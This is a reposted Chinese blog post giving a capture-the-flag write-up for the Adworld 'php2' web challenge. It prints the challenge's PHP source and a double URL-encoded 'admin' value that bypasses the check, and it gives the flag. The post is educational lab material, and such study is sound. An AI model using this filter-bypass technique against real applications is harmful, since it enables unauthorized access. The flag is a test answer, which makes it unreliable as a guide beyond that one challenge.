【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)

编程知识 行业动态 更新时间:2024-06-13 00:22:54

文章目录

  • 一、php2
  • 二、使用步骤
    • 1.点击获取在线场景
    • 2.进入页面
  • 总结


一、php2

题目链接:https://adworld.xctf/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.进入页面

index.php

输入地址

http://111.200.241.244:55773/index.phps

得到

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

代码审计,可以看出,get接受id=admin

查看不被允许
进行admin二次编码:%2561%2564%256d%2569%256e 这是url二次编码

http://111.200.241.244:55773/index.php?id=%2561%2564%256d%2569%256e


得到flag:cyberpeace{67cbbc9953933686d0d29409017fa15c}


总结

  • 源码审计
  • 二次编码

更多推荐

【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)

本文发布于:2023-04-03 12:14:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/941aed698a9b72e33c791dc37502aa27.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:愚公   进阶   攻防   系列   世界

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!